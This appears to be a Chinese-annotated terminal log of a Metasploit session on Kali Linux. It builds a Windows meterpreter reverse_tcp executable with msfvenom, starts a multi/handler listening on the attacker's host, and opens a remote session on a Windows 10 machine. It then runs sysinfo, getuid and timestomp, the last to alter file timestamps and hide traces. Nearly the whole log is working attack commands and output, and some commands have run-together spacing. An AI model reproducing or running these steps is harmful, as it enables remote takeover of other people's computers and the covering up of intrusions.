root@kali:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost= lport=1234 --format=exe> /root/attack.exe

No platform was selected, choosingMsf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 fromthe payload

No encoder or badchars specified,outputting raw payload

Payload size: 333 bytes

Final size of exe file: 73802 bytes

Saved as: /root/attack.exe            (病毒)

root@kali:~# service postgresql start

root@kali:~# msfconsole

root@kali:~# db_status

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost192.168.1.117                            (kali linux主机)

msf exploit(handler) > set lport 1234

msf exploit(handler) > show options

msf exploit(handler) > exploit -h

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.


[*] Started reverse TCP handler on192.168.1.117:1234

msf exploit(handler) > [*] Starting thepayload handler...



msf exploit(handler) > [*] Starting thepayload handler...

[*] Sending stage (957999 bytes) to192.168.1.94

[*] Meterpreter session 1 opened( -> at 2017-03-10 00:16:54 -0500    (windows主机运行attack.exe后产生session 1)

msf exploit(handler) > sessions -i


Active sessions



 Id  Type                   Information              Connection

 --  ----                   -----------              ----------

 1   meterpreter x86/win32  sh-270\sewells @ SH-270 ->

msf exploit(handler) > sessions -i1               (1是session Id号码)

meterpreter > pwd                        (成功登陆)


meterpreter > sysinfo

Computer       : SH-270

OS              : Windows 10 (Build 14393).

Architecture    : x64 (Current Process is WOW64)

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/win32

meterpreter > getuid

Server username: sh-270\sewells

meterpreter > timestomp -h            修改***时间

meterpreter > timestomp attack.exe -v

Modified      : 2017-03-10 00:01:11 -0500

Accessed      : 2017-03-10 00:03:26 -0500

Created       : 2017-03-10 00:18:07 -0500

Entry Modified: 2017-03-10 00:18:07 -0500